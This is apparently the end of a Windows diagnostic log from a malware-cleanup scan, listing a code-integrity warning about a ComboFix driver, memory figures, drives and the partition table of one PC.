    Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.


    ==================== Memory info ===========================

    Processor: Intel(R) Core(TM) i3 CPU 550 @ 3.20GHz
    Percentage of memory in use: 71%
    Total physical RAM: 6071.11 MB
    Available physical RAM: 1744.52 MB
    Total Pagefile: 9527.11 MB
    Available Pagefile: 3781.24 MB
    Total Virtual: 8192 MB
    Available Virtual: 8191.79 MB

    ==================== Drives ================================

    Drive c: (Acer) (Fixed) (Total:917.74 GB) (Free:5.05 GB) NTFS
    Drive f: (PHONE) (Removable) (Total:0.02 GB) (Free:0.02 GB) FAT

    ==================== MBR & Partition Table ==================

    ========================================================
    Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 7EDF2454)
    Partition 1: (Not Active) - (Size=13.7 GB) - (Type=27)
    Partition 2: (Active) - (Size=100 MB) - (Type=07 NTFS)
    Partition 3: (Not Active) - (Size=917.7 GB) - (Type=07 NTFS)
    Could not read MBR for disk 3.

    ==================== End Of Log ============================
     